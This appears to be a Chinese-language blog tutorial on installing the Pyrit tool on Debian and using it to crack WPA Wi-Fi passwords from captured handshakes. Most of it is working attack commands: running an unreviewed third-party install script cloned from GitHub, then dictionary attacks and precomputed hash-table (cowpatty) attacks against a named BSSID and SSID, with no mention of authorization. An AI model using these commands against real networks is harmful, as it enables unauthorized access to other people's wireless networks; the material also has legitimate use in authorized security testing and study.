pyrit是一款开源且完全免费的软件,任何人都可以检查,复制或修改它。它在各种平台上编译和执行,包括FreeBSD、MacOS X和Linux作为操作系统以及x86、alpha、arm等处理器。
使用pyrit工具最大的优点,在于它可以使用除CPU之外的GPU运算加速生成彩虹表,本身支持抓包获取四步握手过程,无须使用airodump抓包,如果已经通过ariodump抓取数据,也可以使用pyrit进行读取。
1.修改更新源
vim /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/debian/ buster main contrib non-free
deb http://mirrors.ustc.edu.cn/debian/ buster-updates main contrib non-free
deb http://mirrors.ustc.edu.cn/debian/ buster-backports main contrib non-free
deb http://mirrors.ustc.edu.cn/debian-security buster/updates main contrib non-free
2.更新安装源
apt-get update && apt-get upgrade
3.下载pyrit
现在网上一大堆安装pyrit的方法都会出现依赖报错
这里直接提供一个方法
pyrit安装包地址:
https://github.com/hacker3983/pyrit-installer.git
git clone https://github.com/hacker3983/pyrit-installer.git
cd pyrit-installer
bash install.sh
而且这个打包的安装文件可以检测pyrit所依赖的py版本等,进行自动删改,应该能解决类似所有问题
1、下载scapy:
wget -v https://github.com/secdev/scapy/archive/v2.3.2.tar.gz
2、解压后进入目录执行安装:
tar -xzvf tar -xzvf scapy-2.3.2.tar.gz
cd scapy-2.3.2
python2 setup.py build
python2 setup.py install
1.分析握手包信息
pyrit -r cap包 analyze
-r:pcap格式的数据包捕获源
analyze:分析数据包捕获文件
pyrit -r wpa-1-01.cap analyze
2.密码字典渗透WiFi
pyrit -r 握手包 -i 字典 -b bssid attack_passthrough
-i:输入的文件名
-b:按BSSID筛选AccessPoint
attack_passthrough:用文件中的密码攻击握手
pyrit -r wpa-1-01.cap -i pwd.txt -b d8:24:bd:79:18:0b attack_passthrough
可以看到这样加速的情况速度还是比较慢的,我们还以用hash-table加速破解速度,关于如何生成hash-table,我之前的文章里有写过,大家可以去查阅
3.hash-table加速渗透wifi,将字典转换成hash-table的形式
genpmk -f pwd.txt -d ./pwdhash -s cisco-1809
-s wifi的SSID
生成hask-table速度比较慢,一般要几小时,但是具有可传播性
pyrit -r 握手包 -i 哈希列表 -b bssid attack_cowpatty
attack_cowpatty:攻击一个来自cowpatty文件的PMK握手
pyrit -r wpa-1-01.cap -i pwdhash -b d8:24:bd:79:18:0b attack_cowpatty
可以看到换成hash-table后破解速度非常的快,达到了四千万每秒的破解速度